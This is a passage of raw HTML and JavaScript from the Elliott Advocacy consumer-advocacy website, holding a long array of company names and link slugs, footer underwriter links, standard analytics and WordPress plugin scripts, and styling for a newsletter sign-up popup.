Casino"},{link:"quality-inn-and-suites",name:"Quality Inn and Suites"},{link:"radisson",name:"Radisson"},{link:"ramada",name:"Ramada"},{link:"renaissance",name:"Renaissance"},{link:"residence-inn",name:"Residence Inn"},{link:"ritz-carlton",name:"Ritz-Carlton"},{link:"rodeway-inn",name:"RodeWay Inn"},{link:"sandals",name:"Sandals"},{link:"sheraton-hotels-and-resorts",name:"Sheraton Hotels and Resorts"},{link:"sleep-inn",name:"Sleep Inn"},{link:"springhill-suites",name:"Springhill Suites"},{link:"st-regis-hotels",name:"St. Regis Hotels"},{link:"starwood",name:"Starwood Hotels and Resorts"},{link:"staybridge-suites",name:"Staybridge Suites"},{link:"stoney-creek-hotels",name:"Stoney Creek Hotels"},{link:"suburban-hotels",name:"Suburban Hotels"},{link:"super-8",name:"Super 8"},{link:"towneplace-suites",name:"TownePlace Suites"},{link:"travelodge",name:"Travelodge"},{link:"tryp-by-wyndham",name:"Tryp by Wyndham"},{link:"vrbo",name:"VRBO"},{link:"w-hotels",name:"W Hotels"},{link:"waldorf-astoria-hotels-and-resorts",name:"Waldorf-Astoria Hotels and Resorts"},{link:"westin-hotels-and-resorts",name:"Westin Hotels and Resorts"},{link:"wingate",name:"Wingate"},{link:"worldmark-by-wyndham",name:"WorldMark by Wyndham"},{link:"wyndham-hotel-group",name:"Wyndham Hotels & Resorts"},{link:"wyndham-vacation-ownership",name:"Wyndham Vacation Ownership"},{link:"xanterra-parks-resorts",name:"Xanterra Travel Collection"},{link:"aetna",name:"Aetna"},{link:"aflac",name:"Aflac"},{link:"aig-insurance",name:"AIG Insurance"},{link:"allianz",name:"Allianz"},{link:"american-automobile-association-aaa",name:"American Automobile Association (AAA)"},{link:"american-home-shield",name:"American Home Shield"},{link:"amex-assurance-company-travel-insurance",name:"Amex Assurance Company Travel Insurance"},{link:"arch-insurance-group",name:"Arch Insurance Group"},{link:"berkelycare-travel-insurance",name:"Aon Affinity Worldwide/BerkelyCare Travel Insurance"},{link:"cigna",name:"Cigna"},{link:"cobraguard",name:"CobraGUARD"},{link:"csa-travel-protection",name:"CSA Travel Protection"},{link:"express-scripts",name:"Express Scripts"},{link:"first-american-home-warranty",name:"First American Home Warranty"},{link:"geico",name:"GEICO"},{link:"generali-global-assistance",name:"Generali Global Assistance"},{link:"humana",name:"Humana"},{link:"nationwide-insurance",name:"Nationwide Insurance"},{link:"now-health-international",name:"Now Health International"},{link:"on-call-international",name:"On Call International"},{link:"progressive",name:"Progressive"},{link:"rbc-insurance",name:"RBC Travel Protection"},{link:"servicemaster",name:"ServiceMaster"},{link:"seven-corners",name:"Seven Corners"},{link:"travel-guard",name:"AIG Travel (Travel Guard)"},{link:"travelex-insurance-services",name:"Travelex Insurance Services"},{link:"trip-mate",name:"Trip Mate"},{link:"altice-usa",name:"Altice USA"},{link:"amazon",name:"Amazon"},{link:"aol",name:"AOL"},{link:"centurylink",name:"CenturyLink"},{link:"cox-communications",name:"Cox Communications"},{link:"craigslist",name:"Craigslist"},{link:"facebook",name:"Facebook"},{link:"google",name:"Google"},{link:"groupon",name:"Groupon"},{link:"jet-com",name:"Jet.com"},{link:"lands-end",name:"Lands' End"},{link:"livingsocial",name:"LivingSocial"},{link:"microsoft",name:"Microsoft"},{link:"paypal",name:"PayPal"},{link:"pinterest",name:"Pinterest"},{link:"sirius-xm-radio",name:"Sirius XM Radio"},{link:"tripadvisor",name:"TripAdvisor"},{link:"twitter",name:"Twitter"},{link:"virgin-media",name:"Virgin Media"},{link:"western-union",name:"Western Union"},{link:"yahoo",name:"Yahoo!"},{link:"yelp",name:"Yelp"},{link:"aeroplan-aimia",name:"Aeroplan (Aimia)"},{link:"amtrak",name:"Amtrak"},{link:"big-bus-tours",name:"Big Bus Tours"},{link:"deutsche-bahn",name:"Deutsche Bahn"},{link:"eurostar",name:"Eurostar"},{link:"flixbus",name:"Flixbus"},{link:"greyhound-bus-lines",name:"Greyhound Bus Lines"},{link:"lyft",name:"Lyft"},{link:"megabus-com-coach-usa",name:"Megabus.com / Coach USA"},{link:"supershuttle",name:"SuperShuttle"},{link:"uber",name:"Uber"},{link:"washington-metropolitan-area-transit-authority",name:"Washington Metropolitan Area Transit Authority"},{link:"agoda",name:"Agoda"},{link:"airtkt",name:"AirTkt"},{link:"amoma",name:"Amoma"},{link:"apple-leisure-group",name:"Apple Leisure Group"},{link:"booking-com",name:"Booking.com"},{link:"bookit-com",name:"Bookit.com"},{link:"cheapoair",name:"CheapOair"},{link:"expedia",name:"Expedia"},{link:"explore-trip",name:"ExploreTrip"},{link:"fareportal",name:"Fareportal"},{link:"homeaway-com",name:"HomeAway.com"},{link:"hotwire",name:"Hotwire"},{link:"international-voyager-inc",name:"International Voyager, Inc."},{link:"justfly-com",name:"JustFly.com"},{link:"orbitz",name:"Orbitz"},{link:"priceline",name:"Priceline"},{link:"travelocity",name:"Travelocity"},{link:"vayama",name:"Vayama"},{link:"webjet",name:"Webjet"},{link:"hearst-communications",name:"Hearst Communications"},{link:"los-angeles-times",name:"Los Angeles Times"},{link:"new-york-times",name:"New York Times"},{link:"philly-com",name:"Philly.com"},{link:"wall-street-journal",name:"Wall Street Journal"},{link:"airstream",name:"Airstream"},{link:"lazydays-rv",name:"Lazydays RV"},{link:"arbys",name:"Arby's"},{link:"dairy-queen",name:"Dairy Queen"},{link:"friendlys-ice-cream",name:"Friendly's Ice Cream"},{link:"livingsocial",name:"LivingSocial"},{link:"maggianos-little-italy",name:"Maggiano's Little Italy"},{link:"opentable",name:"OpenTable"},{link:"panera",name:"Panera"},{link:"pret-a-manger",name:"Pret A Manger"},{link:"starbucks",name:"Starbucks"},{link:"%ef%bb%bf%ef%bb%bfdiamonds-international",name:"Diamonds International & Tanzanite International"},{link:"allbirds",name:"Allbirds"},{link:"amc-theatres",name:"AMC Theatres"},{link:"bed-bath-beyond",name:"Bed Bath & Beyond"},{link:"best-buy",name:"Best Buy"},{link:"bjs-wholesale-club",name:"BJ's Wholesale Club"},{link:"bon-ton",name:"Bon-Ton"},{link:"calatlantic-homes",name:"CalAtlantic Homes"},{link:"costco",name:"Costco"},{link:"cvs-health",name:"CVS Health"},{link:"dicks-sporting-goods",name:"Dick's Sporting Goods"},{link:"dillards",name:"Dillard's"},{link:"dsw",name:"DSW"},{link:"duane-reade",name:"Duane Reade"},{link:"fedex",name:"FedEx"},{link:"frys-electronics",name:"Fry's Electronics"},{link:"groupon",name:"Groupon"},{link:"hamilton-beach",name:"Hamilton Beach"},{link:"harbor-freight",name:"Harbor Freight"},{link:"home-depot",name:"Home Depot"},{link:"hunter-boots",name:"Hunter Boots"},{link:"ikea",name:"Ikea US"},{link:"j-c-penney",name:"J.C. Penney"},{link:"jiffy-lube",name:"Jiffy Lube International"},{link:"kmart",name:"Kmart"},{link:"kohls",name:"Kohl's"},{link:"l-l-bean",name:"L. L. Bean"},{link:"la-fitness",name:"LA Fitness"},{link:"lands-end",name:"Lands' End"},{link:"lavatools",name:"Lavatools"},{link:"lazydays-rv",name:"Lazydays RV"},{link:"lightcraft-outdoor",name:"Lightcraft Outdoor"},{link:"livingsocial",name:"LivingSocial"},{link:"lord-taylor",name:"Lord & Taylor"},{link:"macys",name:"Macy's"},{link:"mattress-firm",name:"Mattress Firm"},{link:"microsoft",name:"Microsoft"},{link:"nebraska-furniture-mart",name:"Nebraska Furniture Mart"},{link:"neiman-marcus",name:"Neiman Marcus"},{link:"nordstrom",name:"Nordstrom"},{link:"nordstromrack-and-hautelook",name:"Nordstrom Rack and HauteLook"},{link:"office-depot",name:"Office Depot"},{link:"office-max",name:"Office Max"},{link:"pret-a-manger",name:"Pret A Manger"},{link:"procter-gamble",name:"Procter & Gamble"},{link:"radio-shack",name:"Radio Shack"},{link:"recreational-equipment-inc-rei",name:"Recreational Equipment Inc. (REI)"},{link:"restoration-hardware",name:"Restoration Hardware"},{link:"ross-stores",name:"Ross Stores"},{link:"saks-fifth-avenue",name:"Saks Fifth Avenue"},{link:"sams-club",name:"Sam's Club"},{link:"sears",name:"Sears Holdings Corporation"},{link:"serta",name:"Serta"},{link:"siemens",name:"Siemens"},{link:"sinemia",name:"Sinemia"},{link:"staples",name:"Staples"},{link:"target-corporation",name:"Target Corporation"},{link:"the-popcorn-factory",name:"The Popcorn Factory"},{link:"ticketmaster",name:"Ticketmaster"},{link:"tjx-companies",name:"TJX Companies"},{link:"u-haul",name:"U-Haul"},{link:"ups",name:"UPS"},{link:"urbn",name:"URBN"},{link:"walgreens",name:"Walgreens"},{link:"walmart",name:"Walmart"},{link:"williams-sonoma",name:"Williams-Sonoma"},{link:"wolverine-world-wide",name:"Wolverine World Wide"},{link:"aarp-inc",name:"AARP"},{link:"brookdale-senior-living",name:"Brookdale Senior Living"},{link:"gables-residential",name:"Gables Residential"},{link:"adobe-systems",name:"Adobe Systems"},{link:"intuit",name:"Intuit"},{link:"microsoft",name:"Microsoft"},{link:"extra-space-storage",name:"Extra Space Storage"},{link:"public-storage",name:"Public Storage"},{link:"att",name:"AT&T Communications"},{link:"centurylink",name:"CenturyLink"},{link:"cox-communications",name:"Cox Communications"},{link:"frontier-communications",name:"Frontier Communications"},{link:"hughesnet",name:"HughesNet"},{link:"sprint",name:"Sprint"},{link:"t-mobile",name:"T-Mobile"},{link:"verizon-communications-inc",name:"Verizon Communications"},{link:"verizon-wireless",name:"Verizon Wireless"},{link:"vonage",name:"Vonage"},{link:"cedar-fair",name:"Cedar Fair"},{link:"disney-world",name:"Disney World"},{link:"merlin-entertainments",name:"Merlin Entertainments"},{link:"seaworld-entertainment",name:"SeaWorld Entertainment"},{link:"six-flags",name:"Six Flags"},{link:"universal-studios-hollywood",name:"Universal Studios Hollywood"},{link:"universal-studios-orlando",name:"Universal Studios Orlando"},{link:"walt-disney-company",name:"The Walt Disney Company"},{link:"diamond-resorts",name:"Diamond Resorts"},{link:"disney-vacation-club",name:"Disney Vacation Club"},{link:"hilton-grand-vacations",name:"Hilton Grand Vacations"},{link:"interval-international",name:"Interval International"},{link:"palladium-travel-club",name:"Palladium Travel Club"},{link:"westgate-resorts",name:"Westgate Resorts"},{link:"wyndham-vacation-ownership",name:"Wyndham Vacation Ownership"},{link:"apple-leisure-group",name:"Apple Leisure Group"},{link:"gray-line-new-york",name:"Gray Line"},{link:"great-value-vacations",name:"Great Value Vacations"},{link:"oku-japan",name:"Oku Japan Tours"},{link:"road-scholar",name:"Road Scholar"},{link:"roberts-hawaii",name:"Roberts Hawaii"},{link:"vantage-deluxe-world-travel",name:"Vantage Deluxe World Travel"},{link:"american-automobile-association-aaa",name:"American Automobile Association (AAA)"},{link:"american-express-travel",name:"American Express Travel"},{link:"apple-leisure-group",name:"Apple Leisure Group"},{link:"cruisedirect-com",name:"CruiseDirect.com"},{link:"gate-1-travel",name:"Gate 1 Travel"},{link:"globus",name:"Globus"},{link:"grand-circle-travel",name:"Grand Circle Travel"},{link:"great-value-vacations",name:"Great Value Vacations"},{link:"hotels-com",name:"Hotels.com"},{link:"international-travel-network",name:"International Travel Network"},{link:"jet-charters",name:"JetCharters.com / Conceptrix, LLC"},{link:"lindblad-expeditions-national-geographic",name:"Lindblad Expeditions / National Geographic"},{link:"onetravel",name:"OneTravel"},{link:"rail-europe",name:"Rail Europe"},{link:"studentuniverse",name:"StudentUniverse"},{link:"travel-leaders",name:"Travel Leaders"},{link:"tripadvisor",name:"TripAdvisor"},{link:"tui-airlines",name:"TUI Airlines"},{link:"vacances-air-canada",name:"Air Canada Vacations"},{link:"vacations-to-go",name:"Vacations To Go"},{link:"vantage-deluxe-world-travel",name:"Vantage Deluxe World Travel"},{link:"adt",name:"ADT"},{link:"baltimore-gas-electric-bge",name:"Baltimore Gas and Electric (BGE)"},{link:"charter-communications-charter-spectrum",name:"Charter Communications / Charter Spectrum"},{link:"generac-power-systems-incorporated",name:"Generac Power Systems"},];</script> </div> <footer id="colophon" class="site-footer"> <div class="site-info"> <section id="custom_html-11" class="widget_text widget widget_custom_html footer"><h2 class="widget-title">Help us help you</h2><div class="textwidget custom-html-widget"><div id="help-us-help-you"> <div> <h3>I'm a consumer</h3> <p> Consumer advocacy is difficult and dangerous work. We rely on individual supporters to cover the sizaeable costs of publishing a daily news site. </p> <p> <a href="/support/">Donate</a> </p> </div> <div> <h3>I'm with a company</h3> <p> Elliott Advoacy works with forward-looking companies who want to be associated with our advocacy mission. Find out how to get involved. </p> <p> <a href="https://www.elliott.org/support/corporate-underwriters/">More</a> </p> </div> </div></div></section><section id="custom_html-7" class="widget_text widget widget_custom_html footer"><h2 class="widget-title">Elliott Advocacy Underwriters</h2><div class="textwidget custom-html-widget"><div id="footer-underwriter-logos" data-display="7"> <a href="https://www.travelguard.com/" target="_blank"><img data-src="/wp-content/uploads/aig-2.png" alt="AIG"></a> <a href="https://www.airhelp.com/" target="_blank"><img data-src="/wp-content/uploads/airhelp-1.png" alt="AirHelp"></a> <a href="https://allianztravelinsurance.com" target="_blank"><img data-src="/wp-content/uploads/alliancetravelinsurance.png" alt="Allianz"></a> <a href="https://www.roamright.com/" target="_blank"><img data-src="/wp-content/uploads/Arch-RoamRight-Logo-White-1.png" alt="Arch RoamRight"></a> <a href="http://www.cavalrytravelinsurance.com/" target="_blank"><img data-src="/wp-content/uploads/Cavalry-Logo.png" alt="Cavalry"></a> <a href="https://www.chubb.com/" target="_blank"><img data-src="/wp-content/uploads/chubb-1.png" alt="Chubb"></a> <a href="https://www.enterprise.com/" target="_blank"><img data-src="/wp-content/uploads/enterprise-1.png" alt="Enterprise"></a> <a href="http://www.fareportal.com/" target="_blank"><img data-src="/wp-content/uploads/fareportal-1.png" alt="Fareportal"></a> <a href="http://www.g1g.com/" target="_blank"><img data-src="/wp-content/uploads/g1logo.png" alt="G1G"></a> <a href="https://www.insuremyrentalcar.com/" target="_blank"><img data-src="/wp-content/uploads/insuremyrentalcar.com_-1.png" alt="InsureMyRentalCar.com"></a> <a href="https://www.mediacomcable.com/" target="_blank"><img data-src="/wp-content/uploads/mediacom-1.png" alt="Mediacom"></a> <a href="https://medjetassist.com/" target="_blank"><img data-src="/wp-content/uploads/medjectassist-1.png" alt="Medjet"></a> <a href="https://www.scottevest.com/" target="_blank"><img data-src="/wp-content/uploads/scottevest-1.png" alt="SCOTTeVEST"></a> <a href="https://www.sevencorners.com/#start" target="_blank"><img data-src="/wp-content/uploads/sevencorners.png" alt="Seven Corners"></a> <a href="https://www.sodexousa.com/home.html" target="_blank"><img data-src="/wp-content/uploads/sodexo-white.png" alt="Sodexo"></a> <a href="https://www.southwest.com/" target="_blank"><img data-src="/wp-content/uploads/southwest-1.png" alt="Southwest"></a> <a href="https://www.squaremouth.com/" target="_blank"><img data-src="/wp-content/uploads/squaremouth-1.png" alt="SquareMouth"></a> <a href="https://www.travelersunited.org/" target="_blank"><img data-src="/wp-content/uploads/travelersunited-1.png" alt="Travelers United"></a> <a href="https://www.travelinsurance.com/" target="_blank"><img data-src="/wp-content/uploads/travelinsurance.com_-1.png" alt="TravelInsurance.com"></a> <a href="https://www.travelleadersgroup.com/" target="_blank"><img data-src="/wp-content/uploads/travelleadersgroup-1.png" alt="Travel Leaders Group"></a> <a href="https://www.travelexinsurance.com/" target="_blank"><img data-src="/wp-content/uploads/Travelex-Logotag_WHITE.png" alt="Travelex"></a> <a href="https://www.virtuoso.com/" target="_blank"><img data-src="/wp-content/uploads/virtuoso-1.png" alt="Virtuoso"></a> <a href="https://www.visitorscoverage.com/" target="_blank"><img data-src="/wp-content/uploads/visitorscoverage-1.png" alt="Visitors Coverage"></a> <a href="https://www.worldnomads.com/travel-insurance/" target="_blank"><img data-src="/wp-content/uploads/wordnomads.png" alt="World Nomads"></a> </div> </div></section><section id="text-60" class="widget widget_text footer"> <div class="textwidget"><p>(c) 1994-2019 <a href="https://www.elliott.org/about-elliott-consumer-advocacy/">Elliott Advocacy Inc.,</a> a 501(c)(3) nonprofit organization<br /> EIN 82-5210912</p> </div> </section><section id="custom_html-10" class="widget_text widget widget_custom_html footer"><div class="textwidget custom-html-widget"><script async src="https://www.googletagmanager.com/gtag/js?id=GA_TRACKING_ID"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-310689-1'); </script></div></section> </div> </footer> </div> <script type='text/javascript'> /* <![CDATA[ */ var countVars = {"disqusShortname":"elliott"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.elliott.org/wp-content/plugins/disqus-comment-system/public/js/comment_count.js?ver=3.0.17'></script> <script type='text/javascript'> window.lazySizesConfig = window.lazySizesConfig || {}; </script> <script type='text/javascript' async="async" src='https://www.elliott.org/wp-content/plugins/lazy-load-optimizer/assets/frontend/js/lazysizes.min.js?ver=1.3.1'></script> <script type='text/javascript'> document.addEventListener('lazyloaded', function (e){ var alt = e.target.getAttribute('data-alt'); if(alt){ e.target.removeAttribute('data-alt'); e.target.setAttribute('alt',alt); } var title = e.target.getAttribute('data-title'); if(title){ e.target.removeAttribute('data-title'); e.target.setAttribute('title',title); }}); </script> <script type='text/javascript' src='https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js?ver=2.2.14.0'></script> <script type='text/javascript'> /* <![CDATA[ */ var mailoptin_globals = {"public_js":"http:\/\/www.elliott.org\/wp-content\/plugins\/mailoptin\/src\/core\/src\/assets\/js\/src","mailoptin_ajaxurl":"\/?mailoptin-ajax=%%endpoint%%","is_customize_preview":"false","disable_impression_tracking":"false"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.elliott.org/wp-content/plugins/mailoptin/src/core/src/assets/js/mailoptin.min.js?ver=2.2.14.0'></script> <script type='text/javascript'> /* <![CDATA[ */ var pollsL10n = {"ajax_url":"https:\/\/www.elliott.org\/wp-admin\/admin-ajax.php","text_wait":"Your last request is still being processed. Please wait a while ...","text_valid":"Please choose a valid poll answer.","text_multiple":"Maximum number of choices allowed: ","show_loading":"1","show_fading":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.elliott.org/wp-content/plugins/wp-polls/polls-js.js?ver=2.75.2'></script> <script type='text/javascript' src='https://www.elliott.org/wp-content/themes/elliott/js/navigation.js?ver=20151215'></script> <script type='text/javascript' src='https://www.elliott.org/wp-content/themes/elliott/js/skip-link-focus-fix.js?ver=20151215'></script> <script type='text/javascript' src='https://www.elliott.org/wp-includes/js/wp-embed.min.js?ver=5.1.1'></script> <div id='scThpZHlNB' class="moOptinForm mo-optin-form-lightbox mo-has-name-email" data-optin-type='lightbox' style='display: none;position: fixed;zoom: 1;text-align: center;z-index: 99999999;left: 0;top: 0;width: 100%;height: 100%;overflow: auto;background: rgba(0,0,0,0.7)'><div class='mo-optin-form-container' id='scThpZHlNB_lightbox_container' style='position:relative;margin: 0 auto;'><script type="text/javascript">var scThpZHlNB = scThpZHlNB_lightbox = {"optin_uuid":"scThpZHlNB","optin_campaign_id":1,"optin_campaign_name":"Elegance Elliott campaign","optin_type":"lightbox","post_id":67236,"cookie":30,"success_cookie":30,"global_cookie":0,"global_success_cookie":0,"success_message":"Thanks for subscribing! Please check your email for further instructions.","name_field_required":true,"x_seconds_status":true,"x_seconds_value":11,"x_scroll_status":true,"x_scroll_value":36,"exit_intent_status":true,"success_action":"success_message","test_mode":false,"icon_close":false,"body_close":true,"keyClose":true,"unexpected_error":"Unexpected error. Please try again.","email_missing_error":"Please enter a valid email.","name_missing_error":"Please enter a name.","note_acceptance_error":"Please accept our terms.","honeypot_error":"Your submission has been flagged as potential spam.","effects":"","device_targeting_hide_desktop":false,"device_targeting_hide_tablet":false,"device_targeting_hide_mobile":false};</script><style id="mo-optin-form-stylesheet" type="text/css">html div#scThpZHlNB div#scThpZHlNB_lightbox.moEleganceModal { border: 3px solid #fff; width: 100%; max-width: 600px; position: relative; margin: auto; border-radius: 10px; background: #fff; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; padding: 1.5em 2.5em; box-shadow: 8px 0 20px 14px rgba(0, 0, 0, 0.08) } html div#scThpZHlNB div#scThpZHlNB_lightbox.moEleganceModal h2.moElegance_header { color: #000; margin: 0; line-height: 1.5; text-align: center; text-transform: capitalize } html div#scThpZHlNB div#scThpZHlNB_lightbox.moEleganceModal .moElegance_description { line-height: 1.5; text-align: center; color: #777; margin-bottom: 2em; } html div#scThpZHlNB div#scThpZHlNB_lightbox.moEleganceModal .moElegance_note { line-height: 1.5; text-align: center; color: #000; margin-top: 10px } html div#scThpZHlNB div#scThpZHlNB_lightbox.moEleganceModal input.moEleganceModal_input_fields, html div#scThpZHlNB div#scThpZHlNB_lightbox.moEleganceModal input.mo-optin-form-custom-field.text-field, html div#scThpZHlNB div#scThpZHlNB_lightbox.moEleganceModal textarea.mo-optin-form-custom-field.textarea-field { display: block; width: 100%; max-width: 100%; padding: 10px; margin: 0.5em auto 0; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; font-size: 16px; border: 1px solid #e3e3e3; outline: 1px solid #e3e3e3; background-color: #ffffff; } html div#scThpZHlNB div#scThpZHlNB_lightbox.moEleganceModal textarea.mo-optin-form-custom-field.textarea-field { min-height: 80px; } html div#scThpZHlNB div#scThpZHlNB_lightbox.moEleganceModal input.moEleganceModal_button { display: block; margin: 10px auto 0; text-decoration: none; text-align: center; padding: 0.5em 0; font-size: 18px; text-transform: uppercase; background: #2785C8; color: #ffffff; line-height: normal; border: 0 none; border-radius: 0; outline: 1px solid #2785C8; width: 100%; -webkit-transition: all 0.5s ease-in-out; -moz-transition: all 0.5s ease-in-out; -o-transition: all 0.5s ease-in-out; transition: all 0.5s ease-in-out; } html div#scThpZHlNB div#scThpZHlNB_lightbox.moEleganceModal .moEleganceModal_button:hover { background: #52A9E7; } html div#scThpZHlNB div#scThpZHlNB_lightbox.moEleganceModal .moEleganceModal_button:active { background: #fff; } html div#scThpZHlNB div#scThpZHlNB_lightbox.moEleganceModal .moEleganceModalclose { position: absolute; right: 12px; top: 16px; width: 24px; height: 24px; background-repeat: no-repeat; cursor: pointer } html div#scThpZHlNB div#scThpZHlNB_lightbox.moEleganceModal .mo-optin-error { display: none; background: #FF0000; color: #ffffff; text-align: center; padding: .2em; margin: 0 auto -9px; width: 100%; font-size: 16px; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; border: 1px solid #FF0000; outline: 1px solid #FF0000; } html div#scThpZHlNB div#scThpZHlNB_lightbox.moEleganceModal a.moEleganceModalclose { background-image: url(http://www.elliott.org/wp-content/plugins/mailoptin/src/core/src/assets/images/optin-themes/elegance-close.png); font-size: 9px; margin: auto; display: block; text-align: center }div#scThpZHlNB *, div#scThpZHlNB *:before, div#scThpZHlNB *:after {box-sizing: border-box;-webkit-box-sizing: border-box;-moz-box-sizing: border-box;}div#scThpZHlNB_lightbox_container div.mo-optin-powered-by{margin:5px auto 2px;text-align:center;}div#scThpZHlNB_lightbox_container div.mo-optin-powered-by a {font-size:16px !important; text-decoration: none !important;box-shadow:none !important;border-bottom-width:0px !important;cursor:pointer !important;}div#scThpZHlNB_lightbox_container #mo-acceptance-checkbox {background-color: #fff;line-height: 0;border: 1px solid #bbb;width: 16px;min-width: 16px;height: 16px;margin: 0 5px 0 0 !important;outline: 0;text-align: center;vertical-align: middle;clear: none;cursor: pointer;}div#scThpZHlNB_lightbox_container .mo-acceptance-label {cursor:pointer}div#scThpZHlNB_lightbox_container div#scThpZHlNB_lightbox p {padding:0px !important;margin:0px !important}div#scThpZHlNB .mo-optin-form-wrapper label {color:inherit;font-weight: normal;margin: 0;padding:0;}div#scThpZHlNB.mo-cta-button-flag .mo-optin-form-note .mo-acceptance-label {display:none;}div#scThpZHlNB .mailoptin-video-container { position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden; } div#scThpZHlNB .mailoptin-video-container iframe, div#scThpZHlNB .mailoptin-video-container object, div#scThpZHlNB .mailoptin-video-container embed, div#scThpZHlNB .mailoptin-video-container video { position: absolute; top: 0; left: 0; width: 100%; height: 100%; }div#scThpZHlNB.mo-slidein-bottom_right {right: 10px;}div#scThpZHlNB.mo-slidein-bottom_left {left: 10px;} #scThpZHlNB.moModal a.mo-close-modal { position: absolute; top: -15px; right: -14px; display: block; width: 30px; height: 30px; text-indent: -9999px; background: url("data:image/png;base64,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") no-repeat 0 0; background-size: 30px 30px; } @media only screen and (-webkit-min-device-pixel-ratio: 1.5), only screen and (min--moz-device-pixel-ratio: 1.5), only screen and (min-device-pixel-ratio: 1.5) { #scThpZHlNB.moModal a.mo-close-modal { background-image: url(http://www.elliott.org/wp-content/plugins/mailoptin/src/core/src/assets/images/[email protected]); } } #scThpZHlNB.moModal .mo-optin-form-container { max-width: 700px; } #scThpZHlNB.moModal .mo-optin-form-container p { margin: 0; } @media (max-width: 700px) { #scThpZHlNB.moModal .mo-optin-form-container { margin: 0 15px !important; } }#scThpZHlNB .mo-optin-form-container .mo-optin-spinner { border-radius: inherit; position: absolute; width: 100%; height: 100%; background: #fff 